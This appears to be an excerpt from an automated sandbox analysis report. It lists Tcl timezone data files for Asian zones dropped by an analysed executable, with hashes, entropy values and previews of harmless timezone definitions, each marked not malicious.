SSDEEP:	24:cQPeCtKkjz1lk/mJURqMJDHxyOPq8vWhV0Z8dX83FdX1BzX4JX/v9YsKP2ieGklq:5tK+Zlim0nltdT1BD45X+iA3tnN7
MD5:	BBA59A5886F48DCEC5CEFDB689D36880
SHA1:	8207DE6AB5F7EC6077506ED3AE2EEA3AB35C5FAE
SHA-256:	F66F0F161B55571CC52167427C050327D4DB98AD58C6589FF908603CD53447F0
SHA-512:	D071D97E6773FC22ABCCE3C8BE133E0FDA40C385234FEB23F69C84ABB9042E319D6891BD9CA65F2E0A048E6F374DB91E8880DCD9711A86B79A3A058517A3DBFA
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Hong_Kong) {. {-9223372036854775808 27402 0 LMT}. {-2056693002 28800 0 HKT}. {-907389000 32400 1 HKST}. {-891667800 28800 0 HKT}. {-884246400 32400 0 JST}. {-766746000 28800 0 HKT}. {-747981000 32400 1 HKST}. {-728544600 28800 0 HKT}. {-717049800 32400 1 HKST}. {-694503000 28800 0 HKT}. {-683785800 32400 1 HKST}. {-668064600 28800 0 HKT}. {-654755400 32400 1 HKST}. {-636615000 28800 0 HKT}. {-623305800 32400 1 HKST}. {-605165400 28800 0 HKT}. {-591856200 32400 1 HKST}. {-573715800 28800 0 HKT}. {-559801800 32400 1 HKST}. {-542352600 28800 0 HKT}. {-528352200 32400 1 HKST}. {-510211800 28800 0 HKT}. {-498112200 32400 1 HKST}. {-478762200 28800 0 HKT}. {-466662600 32400 1 HKST}. {-446707800 28800 0 HKT}. {-435213000 32400 1 HKST}. {-415258200 28800 0 HKT}. {-403158600 32400 1 HKST}. {-383808600 28800 0 HKT}. {-371709000 32400 1 HKST}.

C:\Users\user\Desktop\tcl\tzdata\Asia\Hovd Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1480
Entropy (8bit):	3.97785812410914
Encrypted:	false
SSDEEP:	24:cQxEecPfwVOxmljIsWSlWaSYBOr5N2KTxy/w3OqxNwBbBWp+vXxQwC:5MfwVMmJIVSlWaSYBOr32KTxy/w37e2j
MD5:	CBD24A67AE9BE4B0E2F1F82F45EC7D7B
SHA1:	5449DFCA8F74451EB430E76AAD9243FA7A5EC149
SHA-256:	4FFE2AE75CC52CD5496BACF364A0F7BF3ACE05C9B2AD00233CC666DB64785E64
SHA-512:	268F26F58CC9E54978BD8771AE05C68D689EC34FB2FD1A6505258A923DDB8E4687524CC3A1FC83728817A7000E5D8A2B59E146C5CAED9FF54AA71406C5D313D7
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Hovd) {. {-9223372036854775808 21996 0 LMT}. {-2032927596 21600 0 HOVT}. {252439200 25200 0 HOVT}. {417978000 28800 1 HOVST}. {433785600 25200 0 HOVT}. {449600400 28800 1 HOVST}. {465321600 25200 0 HOVT}. {481050000 28800 1 HOVST}. {496771200 25200 0 HOVT}. {512499600 28800 1 HOVST}. {528220800 25200 0 HOVT}. {543949200 28800 1 HOVST}. {559670400 25200 0 HOVT}. {575398800 28800 1 HOVST}. {591120000 25200 0 HOVT}. {606848400 28800 1 HOVST}. {622569600 25200 0 HOVT}. {638298000 28800 1 HOVST}. {654624000 25200 0 HOVT}. {670352400 28800 1 HOVST}. {686073600 25200 0 HOVT}. {701802000 28800 1 HOVST}. {717523200 25200 0 HOVT}. {733251600 28800 1 HOVST}. {748972800 25200 0 HOVT}. {764701200 28800 1 HOVST}. {780422400 25200 0 HOVT}. {796150800 28800 1 HOVST}. {811872000 25200 0 HOVT}. {828205200 28800 1 HOVST}. {843926400 25200 0 HOVT}. {

C:\Users\user\Desktop\tcl\tzdata\Asia\Irkutsk Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	2092
Entropy (8bit):	3.9600198775066993
Encrypted:	false
SSDEEP:	24:cQoew1xTwhTFwDHZwZ3awOvwl2zbufw5+rwg0gRww6wH8/w1Gd+RwYW61/XnEwKI:5y1xx4CP6qaPfDkb1MhdoS
MD5:	4A82846959A64A2D7DC8C6213F2AAF7F
SHA1:	1D39B30B99DF9E6FB57B66843DECF94D97307CF2
SHA-256:	3E4B7962D4B35D2CB84F4A8D34B43551CE63FB988C77882F26A4C0A6850AF9E1
SHA-512:	19A5453800DB50103CC0AF9E84D60694021FB616A004FFC9B3A0E2CFCF1AC5D53390858D57055C81E1972696D83FA973A61075040928D0246EE58D9743131395
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Irkutsk) {. {-9223372036854775808 25040 0 LMT}. {-2840165840 25040 0 IMT}. {-1575874640 25200 0 IRKT}. {-1247554800 28800 0 IRKMMTT}. {354902400 32400 1 IRKST}. {370710000 28800 0 IRKT}. {386438400 32400 1 IRKST}. {402246000 28800 0 IRKT}. {417974400 32400 1 IRKST}. {433782000 28800 0 IRKT}. {449596800 32400 1 IRKST}. {465328800 28800 0 IRKT}. {481053600 32400 1 IRKST}. {496778400 28800 0 IRKT}. {512503200 32400 1 IRKST}. {528228000 28800 0 IRKT}. {543952800 32400 1 IRKST}. {559677600 28800 0 IRKT}. {575402400 32400 1 IRKST}. {591127200 28800 0 IRKT}. {606852000 32400 1 IRKST}. {622576800 28800 0 IRKT}. {638301600 32400 1 IRKST}. {654631200 28800 0 IRKT}. {670356000 25200 0 IRKMMTT}. {670359600 28800 1 IRKST}. {686084400 25200 0 IRKT}. {695761200 28800 0 IRKMMTT}. {701794800 32400 1 IRKST}. {717516000 28800 0 IRKT}. {733255200 32400

C:\Users\user\Desktop\tcl\tzdata\Asia\Istanbul Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	182
Entropy (8bit):	4.853387718159342
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFCZaMuUyqxV0XaDvFVAIgoq3XPHt2WFK4HB/8QaqXNn:SlSWB9IZaM3ymQazFVAIgoQPHt2wK4HJ
MD5:	7EC8D7D32DC13BE15122D8E26C55F9A2
SHA1:	5B07C7161F236DF34B0FA83007ECD75B6435F420
SHA-256:	434B8D0E3034656B3E1561615CCA192EFA62942F285CD59338313710900DB6CB
SHA-512:	D8F1999AF509871C0A7184CFEFB0A50C174ABDE218330D9CDC784C7599A655AD55F6F2173096EA91EE5700B978B9A94BBFCA41970206E7ADEB804D0EE03B45ED
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Europe/Istanbul)]} {. LoadTimeZoneFile Europe/Istanbul.}.set TZData(:Asia/Istanbul) $TZData(:Europe/Istanbul).

C:\Users\user\Desktop\tcl\tzdata\Asia\Jakarta Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	350
Entropy (8bit):	4.5153507787129215
Encrypted:	false
SSDEEP:	6:SlSWB9X52wKcr6m2OHATJesaPfkc5q/wQmWSyvmJdwQo1RoF4mwQmTFSwQL:MBp52E6mdHjF8c5awSSyIwd4F4mwlF1E
MD5:	6AEEF908C9BE8AC7A42146BEEC37FD15
SHA1:	6F7476A32C14FE35B967985D2134A0A0CB428E55
SHA-256:	C4CC999AEC9A37C7CAE4BA5C423D15DF2CDE9F2F69AF1CBE45E54D8AF37DB62A
SHA-512:	410418B28E59CED78B0E81E38134961C65D49EF2731107C434927026D13A58E151F2C5A4BC14F351E694804EA8CE9016C32AB2CFF6FD0E76F5DE91BE561CD1BB
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Jakarta) {. {-9223372036854775808 25632 0 LMT}. {-3231299232 25632 0 JMT}. {-1451719200 26400 0 JAVT}. {-1172906400 27000 0 WIT}. {-876641400 32400 0 JST}. {-766054800 27000 0 WIT}. {-683883000 28800 0 WIT}. {-620812800 27000 0 WIT}. {-189415800 25200 0 WIT}.}.

C:\Users\user\Desktop\tcl\tzdata\Asia\Jayapura Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	203
Entropy (8bit):	4.832277505445329
Encrypted:	false
SSDEEP:	6:SlSWB9X52wKcjm2OHG4YVkcfvGtowM7CV4zvLn:MBp52omdHNYacf+toBeVkTn
MD5:	13B1790C0CDF28758F75974C305D85A0
SHA1:	35C81E83592391BFB34426ACEB21E4F7C8398CA4
SHA-256:	CF874CF185EA3D24D2DCC830BDEBD9AD619CAA39BF6563A70F8083DB9C16120F
SHA-512:	9FAD0068583194A98D3237522E50C96A4241D2006C2F3E115CE4431471B7796276CCB1F0246F0D430E03A93C2CD14DA2B772E20C6A6D819A3FFF272C540D5434
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Jayapura) {. {-9223372036854775808 33768 0 LMT}. {-1172913768 32400 0 EIT}. {-799491600 34200 0 CST}. {-189423000 32400 0 EIT}.}.

C:\Users\user\Desktop\tcl\tzdata\Asia\Jerusalem Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	7690
Entropy (8bit):	3.683692524864992
Encrypted:	false
SSDEEP:	96:GzmnxfFtWR8fKnG/QvW+tCE5nfclzs8x6PxGtv2TiGuyLsbAicBnKqXRGlGru6R7:0mK9DivbOKWKwX5BrAZp0
MD5:	005FE6D937588F6A902BF86EDEA160CA
SHA1:	A9863051501D63E8001A376606DD4039BEFF4E9B
SHA-256:	F4C5B81B7660FA18DFF0EE595AEAB8BF59FAA1DA841AF4AC6D21B5A8B7895380
SHA-512:	3D77F7EE91D254BB00F2E8E899F5A301FA64CD6E0F83B70482AD39E67EDEE8A10128D7D223B0266C9BE339ACF4CB37B369F98AF231A5D685384937BC8DF8A8C8
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Jerusalem) {. {-9223372036854775808 8454 0 LMT}. {-2840149254 8440 0 JMT}. {-1641003640 7200 0 IST}. {-933645600 10800 1 IDT}. {-857358000 7200 0 IST}. {-844300800 10800 1 IDT}. {-825822000 7200 0 IST}. {-812685600 10800 1 IDT}. {-794199600 7200 0 IST}. {-779853600 10800 1 IDT}. {-762656400 7200 0 IST}. {-748310400 10800 1 IDT}. {-731127600 7200 0 IST}. {-681962400 14400 1 IDDT}. {-673243200 10800 1 IDT}. {-667962000 7200 0 IST}. {-652327200 10800 1 IDT}. {-636426000 7200 0 IST}. {-622087200 10800 1 IDT}. {-608947200 7200 0 IST}. {-591847200 10800 1 IDT}. {-572486400 7200 0 IST}. {-558576000 10800 1 IDT}. {-542851200 7200 0 IST}. {-527731200 10800 1 IDT}. {-514425600 7200 0 IST}. {-490845600 10800 1 IDT}. {-482986800 7200 0 IST}. {-459475200 10800 1 IDT}. {-451537200 7200 0 IST}. {-428551200 10800 1 IDT}. {-418262400 7200 0 IST}.

C:\Users\user\Desktop\tcl\tzdata\Asia\Kabul Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	171
Entropy (8bit):	4.853601274352773
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFx52WFKTwkXGm2OHodFxsYvXgVHURRNV3Fqdj/cXHFk5:SlSWB9X52wKTEm2OHoH+YPgVHURbRFIR
MD5:	43B74064BEEB2CE6D805234CB47A1EAB
SHA1:	CE3C389E33948A9C45EFE1CD68D01E7D971014C1
SHA-256:	58A8B20C1CB4C0C2F329A0E7869E1F11223E1AC35AC2C275930543A79689170B
SHA-512:	0618804849BC540480DD6E165CBBCAF7675B74580961D02DAF6A158AD10D47EEA57757115F64A67060C8F3D96917FD21F71733DB16D9C3A5E2F4EB6DD99DC4FA
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Kabul) {. {-9223372036854775808 16608 0 LMT}. {-2524538208 14400 0 AFT}. {-788932800 16200 0 AFT}.}.

C:\Users\user\Desktop\tcl\tzdata\Asia\Kamchatka Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	2097
Entropy (8bit):	3.9243582157859627
Encrypted:	false
SSDEEP:	24:cQ+3e8/95MLQe7+F9b2M7Mx8c8JF5i3L5rSv9Bx12S8+igR7todVMwLF68SRWMnW:5c/ryKF9lcFIvDH2BdIf59e32Ct
MD5:	00EB1A20193C078423934CFD3B84B1CE
SHA1:	1C53A7872A3C9E0398F44DF1F441D81B907B6329
SHA-256:	58E26F3AE41EA89F186F109BC1110121C898995A5DD350EDDE69FB805758C253
SHA-512:	0C70BB8D0BC6A3D1A335CF2EB6F065A1FEBAC2C42FD9F87C29CD84015759F13868C01AF364B5D627FC5B0D749D048CDA51D518FC4A34D82FF45A7B20EB1E7928
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Kamchatka) {. {-9223372036854775808 38076 0 LMT}. {-1487759676 39600 0 PETT}. {-1247569200 43200 0 PETMMTT}. {354888000 46800 1 PETST}. {370695600 43200 0 PETT}. {386424000 46800 1 PETST}. {402231600 43200 0 PETT}. {417960000 46800 1 PETST}. {433767600 43200 0 PETT}. {449582400 46800 1 PETST}. {465314400 43200 0 PETT}. {481039200 46800 1 PETST}. {496764000 43200 0 PETT}. {512488800 46800 1 PETST}. {528213600 43200 0 PETT}. {543938400 46800 1 PETST}. {559663200 43200 0 PETT}. {575388000 46800 1 PETST}. {591112800 43200 0 PETT}. {606837600 46800 1 PETST}. {622562400 43200 0 PETT}. {638287200 46800 1 PETST}. {654616800 43200 0 PETT}. {670341600 39600 0 PETMMTT}. {670345200 43200 1 PETST}. {686070000 39600 0 PETT}. {695746800 43200 0 PETMMTT}. {701780400 46800 1 PETST}. {717501600 43200 0 PETT}. {733240800 46800 1 PETST}. {748965600 4320

C:\Users\user\Desktop\tcl\tzdata\Asia\Karachi Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	436
Entropy (8bit):	4.388322988460791
Encrypted:	false
SSDEEP:	12:MBp52SmdH35S6DvJGnQmYd4vJGNEH+emSvtk6a2iW6oNl:cQSe3pJGnQ1oJGNErmKTh
MD5:	3187FD74C102BA1F43F583EC21C793FE
SHA1:	919FBFE5CA517A691F71FEDFA6708C711C57FB56
SHA-256:	69772D2E11F94B0BF327577C7D323115AF876280B1ACE880885F7A7B8294A98D
SHA-512:	31A68FAE751973F8EC4A5AC635EDB4E6A61FA20EC43EC3E555B93ACCA2BE4138ACAD7B75A2ECEE9FFE57E88561CDC0B19A9B8ACA6477461BCB4A5391B8E46CB2
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Karachi) {. {-9223372036854775808 16092 0 LMT}. {-1988166492 19800 0 IST}. {-862637400 23400 1 IST}. {-764145000 19800 0 IST}. {-576135000 18000 0 KART}. {38775600 18000 0 PKT}. {1018119660 21600 1 PKST}. {1033840860 18000 0 PKT}. {1212260400 21600 1 PKST}. {1225476000 18000 0 PKT}. {1239735600 21600 1 PKST}. {1257012000 18000 0 PKT}.}.

C:\Users\user\Desktop\tcl\tzdata\Asia\Kashgar Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	539
Entropy (8bit):	4.260166291497287
Encrypted:	false
SSDEEP:	12:MBp52mrmdH9dXAo/XNkq/HxJ2Qzq/hSaq/5Mq/xssjq/Xwq/4N:cQYeXAo1kq/Hx4Qzq/hLq/Cq/xrq/Aqe
MD5:	A9DD00434A47FA300C70D40A91436662
SHA1:	4A3BE500FC3F4F3F67D918311CA38BF79DC8B62D
SHA-256:	63FF03FC0E0A2767AF2BD071FE6E534C951548D1294FCDD6239FAA80865ED749
SHA-512:	324F94AD202D56EB481E228330FCB8B7AE0C8E5E0528373F96004797386B068B813A309A7856652F1F8E6F8FA7C74CA87DF13E3071B282D7E3443DFE07D1CEE6
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Kashgar) {. {-9223372036854775808 18236 0 LMT}. {-1325480636 19800 0 KAST}. {-946791000 18000 0 KAST}. {325969200 28800 0 CST}. {515520000 32400 1 CDT}. {527007600 28800 0 CST}. {545155200 32400 1 CDT}. {558457200 28800 0 CST}. {576604800 32400 1 CDT}. {589906800 28800 0 CST}. {608659200 32400 1 CDT}. {621961200 28800 0 CST}. {640108800 32400 1 CDT}. {653410800 28800 0 CST}. {671558400 32400 1 CDT}. {684860400 28800 0 CST}.}.

C:\Users\user\Desktop\tcl\tzdata\Asia\Kathmandu Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	174
Entropy (8bit):	4.922860853700539
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFx52WFKXIi7mFSXGm2OHF+VT5vUQKwMTXvvhGFFRk8P4Vvz7YvC:SlSWB9X52wKYgyJm2OH0T5RNMzvJGzR8
MD5:	22F2D8D0784F512229C97AB2BAA8A74D
SHA1:	094F1A9ED44D2C59AC23FC68BBD79F4A9106CD73
SHA-256:	1FE25575950AFD271395661926068B917FA32360B46B94F8DBF148BFB597D24D
SHA-512:	8AF5BACF0ACD0EA8F25F8FC227BCD2CF18735306F41E11763947B2DFF84229511F712E9E6F893D3CEEB36993503D68969D4B0D0FBFA91F469BDDDC23CF9CBA84
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Kathmandu) {. {-9223372036854775808 20476 0 LMT}. {-1577943676 19800 0 IST}. {504901800 20700 0 NPT}.}.

C:\Users\user\Desktop\tcl\tzdata\Asia\Katmandu Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	179
Entropy (8bit):	4.786408960928606
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFCZaMuUyq8yIi7VyVAIgN1AIilHt2WFKSiZ1/2WFKXIi7v:SlSWB9IZaM3y7gVyVAIg5M2wKSg1/2wm
MD5:	A30FEA461B22B2CB3A67A616E3AE08FD
SHA1:	F368B215E15F6F518AEBC92289EE703DCAE849A1
SHA-256:	1E2A1569FE432CDA75C64FA55E24CA6F938C1C72C15FBB280D5B04F6C5E9AD69
SHA-512:	4F3D0681791C23EF19AFF239D2932D2CE1C991406F6DC8E313C083B5E03D806D26337ED2477700596D9A9F4FB1B7FC4A551F897A2A88CB7253CC7F863E586F03
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Asia/Kathmandu)]} {. LoadTimeZoneFile Asia/Kathmandu.}.set TZData(:Asia/Katmandu) $TZData(:Asia/Kathmandu).

C:\Users\user\Desktop\tcl\tzdata\Asia\Khandyga Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	2126
Entropy (8bit):	3.99768986118624
Encrypted:	false
SSDEEP:	48:5NosZaPG2RxLk3IsfrWEL4mGubhEZIIAs5f:NZa9LLk3IsDWEL4nubqZI7s5f
MD5:	437DF1E640F604BF9850A66EEE161AD0
SHA1:	9DC37AE6263F6E35F79956A70D33CB6A04E11086
SHA-256:	CEBA73E53A4DDAAFED47A40BE153000C71AF35F3212B3DFED703765C29FD5605
SHA-512:	603D017129777A3F36FEB2F6B910602DDE87C321C0B1EBF22E7F0C22F7C18E095FE38BF70822FC459CE9EDC9C2C222F496681771A0BC71BACC0C3BA606787478
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Khandyga) {. {-9223372036854775808 32533 0 LMT}. {-1579424533 28800 0 YAKT}. {-1247558400 32400 0 YAKMMTT}. {354898800 36000 1 YAKST}. {370706400 32400 0 YAKT}. {386434800 36000 1 YAKST}. {402242400 32400 0 YAKT}. {417970800 36000 1 YAKST}. {433778400 32400 0 YAKT}. {449593200 36000 1 YAKST}. {465325200 32400 0 YAKT}. {481050000 36000 1 YAKST}. {496774800 32400 0 YAKT}. {512499600 36000 1 YAKST}. {528224400 32400 0 YAKT}. {543949200 36000 1 YAKST}. {559674000 32400 0 YAKT}. {575398800 36000 1 YAKST}. {591123600 32400 0 YAKT}. {606848400 36000 1 YAKST}. {622573200 32400 0 YAKT}. {638298000 36000 1 YAKST}. {654627600 32400 0 YAKT}. {670352400 28800 0 YAKMMTT}. {670356000 32400 1 YAKST}. {686080800 28800 0 YAKT}. {695757600 32400 0 YAKMMTT}. {701791200 36000 1 YAKST}. {717512400 32400 0 YAKT}. {733251600 36000 1 YAKST}. {748976400 32400

C:\Users\user\Desktop\tcl\tzdata\Asia\Kolkata Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	261
Entropy (8bit):	4.664826781670047
Encrypted:	false
SSDEEP:	6:SlSWB9X52wKvCm2OHEX3gYPZLvH7MsckVVFJGTL/FG/mYd4VFJL:MBp523CmdHNYPZTbXvJGnQmYd4vJL
MD5:	50F6DB5384D951D8E6D0823FC01F0955
SHA1:	DFC73B73C8C8DFB2D7C14DA8DEA869BF8AF3986B
SHA-256:	FA74FCB73E4E7E510A152D5531779E94DB531D791F09D1A55EE177A4A0BF3320
SHA-512:	F731CA322D84A55EDA9A1CDDA92DFB75FA3D7CE0041EE61F26CDA360F0A3B3B24E752BE7E918C80559F8A0F2B775327CBEDB6702818DCC8814FC0224E6239DD9
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Kolkata) {. {-9223372036854775808 21208 0 LMT}. {-2840162008 21200 0 HMT}. {-891582800 23400 0 BURT}. {-872058600 19800 0 IST}. {-862637400 23400 1 IST}. {-764145000 19800 0 IST}.}.

C:\Users\user\Desktop\tcl\tzdata\Asia\Krasnoyarsk Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	2066
Entropy (8bit):	3.9524949044733564
Encrypted:	false
SSDEEP:	24:cQOCedXpYVOXgOE2jjyEkFR5Aynx7Xi/X+TipKS5llw+SNXCB3XkE5VXYpobxe5B:5lfKydR/7Sf+uDyPQ3m302jT2o7
MD5:	D140077154EFFBD414A1B73A4EF1E334
SHA1:	BB3AC879198EEB6AE69EF60EAFB80FE95D79D5E4
SHA-256:	05AED196C771EE3CB12356C56F88E41B4ABE85091F33D8A7FD71AF3D7BB3B057
SHA-512:	88AC02D6A717D76A71A59356C3D0B0B974CD3A3BFCCEFC162A6C062517BCD08A0030A80A0ACB064981A24E6FFF5AC096AF1D2211D4057950F990BEF4F1F48CFD
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Krasnoyarsk) {. {-9223372036854775808 22280 0 LMT}. {-1577513480 21600 0 KRAT}. {-1247551200 25200 0 KRAMMTT}. {354906000 28800 1 KRAST}. {370713600 25200 0 KRAT}. {386442000 28800 1 KRAST}. {402249600 25200 0 KRAT}. {417978000 28800 1 KRAST}. {433785600 25200 0 KRAT}. {449600400 28800 1 KRAST}. {465332400 25200 0 KRAT}. {481057200 28800 1 KRAST}. {496782000 25200 0 KRAT}. {512506800 28800 1 KRAST}. {528231600 25200 0 KRAT}. {543956400 28800 1 KRAST}. {559681200 25200 0 KRAT}. {575406000 28800 1 KRAST}. {591130800 25200 0 KRAT}. {606855600 28800 1 KRAST}. {622580400 25200 0 KRAT}. {638305200 28800 1 KRAST}. {654634800 25200 0 KRAT}. {670359600 21600 0 KRAMMTT}. {670363200 25200 1 KRAST}. {686088000 21600 0 KRAT}. {695764800 25200 0 KRAMMTT}. {701798400 28800 1 KRAST}. {717519600 25200 0 KRAT}. {733258800 28800 1 KRAST}. {748983600 25

C:\Users\user\Desktop\tcl\tzdata\Asia\Kuala_Lumpur Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	360
Entropy (8bit):	4.564891512259757
Encrypted:	false
SSDEEP:	6:SlSWB9X52wK1NLm2OHrPmdXiWOb/qgOMesF3His0dqgs8kvmQCIqgN3Ln:MBp52PLmdHrPdDTNF+8tLn
MD5:	2A5F7A3B1E59AF73A5E26771A7640E32
SHA1:	386D0762AF8C53811288115B94F284B1A982FEEE
SHA-256:	53136CFAEA9593D2A8A885947C985026DB08F863CCA36FEF510E8C0EFFC3CEF7
SHA-512:	469D5C1278C5D4D2BE6D2DB4F7F9868C13FA33A22E13DBC103DDE53408A1E15B8D0FF6DBFC2E23F55786A57120DE43B911D6DACFAE903FD99F1710650F69B382
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Kuala_Lumpur) {. {-9223372036854775808 24406 0 LMT}. {-2177477206 24925 0 SMT}. {-2038200925 25200 0 MALT}. {-1167634800 26400 1 MALST}. {-1073028000 26400 0 MALT}. {-894180000 27000 0 MALT}. {-879665400 32400 0 JST}. {-767005200 27000 0 MALT}. {378664200 28800 0 MYT}.}.

C:\Users\user\Desktop\tcl\tzdata\Asia\Kuching Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	703
Entropy (8bit):	4.287678862773185
Encrypted:	false
SSDEEP:	6:SlSWB9X52wKPLKm2OHXXUTdbNMCmGrMF2Mb9KQzztrDcerbhwBuvbnhMrFeiFd3v:MBp52HLKmdHXXUBOvV9rjhWX7zJZn
MD5:	6F86A0A46810B2AD67806D70EEBBC508
SHA1:	D7B07CD9A4B7C60E2DF2E40128B813BAEB34D40D
SHA-256:	623100A7ECB624F697FFAE978878A080D3A24638D945D179A938AAB04A532DBD
SHA-512:	42C57844B398A58A1AA11DBDE29427BD49F61FC5F3B9E66F7850C94574C8AE692FCAE140AA5E531E65461B95E56B6738DB51495D71E675A84C8F6B93A3D01096
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Kuching) {. {-9223372036854775808 26480 0 LMT}. {-1383463280 27000 0 BORT}. {-1167636600 28800 0 BORT}. {-1082448000 30000 1 BORTST}. {-1074586800 28800 0 BORT}. {-1050825600 30000 1 BORTST}. {-1042964400 28800 0 BORT}. {-1019289600 30000 1 BORTST}. {-1011428400 28800 0 BORT}. {-987753600 30000 1 BORTST}. {-979892400 28800 0 BORT}. {-956217600 30000 1 BORTST}. {-948356400 28800 0 BORT}. {-924595200 30000 1 BORTST}. {-916734000 28800 0 BORT}. {-893059200 30000 1 BORTST}. {-885198000 28800 0 BORT}. {-879667200 32400 0 JST}. {-767005200 28800 0 BORT}. {378662400 28800 0 MYT}.}.

C:\Users\user\Desktop\tcl\tzdata\Asia\Kuwait Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	142
Entropy (8bit):	4.948925444416414
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFx52WFKCEXGm2OHCenvTpBJMdVVvwvYv:SlSWB9X52wKom2OHRLrJcVV
MD5:	C5582D38923249E407BB22C99EAB9995
SHA1:	5F5FDF3CC3E3020A2A8E85732D45F0BE566984D6
SHA-256:	21642AECB98B4715C0C6C21039C8DAC8354FB0543B98E550E054D1CEB0A84588
SHA-512:	6B9327CD8D5AADF46BC2E45A970DD4C3F899E3503307412C581A1F8E940C90FC422D47A5462AC6B23D40FD0CA64C49593ECD8C8B39854A477163FCDD51321282
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Kuwait) {. {-9223372036854775808 11516 0 LMT}. {-631163516 10800 0 AST}.}.

C:\Users\user\Desktop\tcl\tzdata\Asia\Macao Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	164
Entropy (8bit):	4.729350272507574
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFCZaMuUyq8PpVAIgNz5YF2WFKf+WFKjn:SlSWB9IZaM3yxVAIgLYF2wKGwKjn
MD5:	DB6155900D4556EE7B3089860AD5C4E3
SHA1:	708E4AE427C8BAF589509F4330C389EE55C1D514
SHA-256:	8264648CF1EA3E352E13482DE2ACE70B97FD37FBB1F28F70011561CFCBF533EA
SHA-512:	941D52208FABB634BABCD602CD468F2235199813F4C1C5AB82A453E8C4CE4543C1CE3CBDB9D035DB039CFFDBC94D5D0F9D29363442E2458426BDD52ECDF7C3C5
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Asia/Macau)]} {. LoadTimeZoneFile Asia/Macau.}.set TZData(:Asia/Macao) $TZData(:Asia/Macau).

C:\Users\user\Desktop\tcl\tzdata\Asia\Macau Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1286
Entropy (8bit):	3.979357479876244
Encrypted:	false
SSDEEP:	24:cQ2eCXRr4zG7JG/UDzUUas7yAckSTcvZIItNnl2TtCjjz21z2:5oRr4y7o8DSlT+ln91
MD5:	D5EAFB8BDD7331EE6152B1FA3C179492
SHA1:	25AB37395DA05A828CFE545931C9EE0BBC47E4CD
SHA-256:	432CC7EA35F46F1BC95F1863FBC540BD1B541BBFD1CE3FFC2DA404C1104E8596
SHA-512:	F26B1FE6EB3561DBC01671452C72912C18AEE8AD34F49BD2F27E44C253F1A17EA1AE1B7E39EE0908272BF92F974CB84995885EBD271797AA492A33D3B42AABBE
Malicious:	false
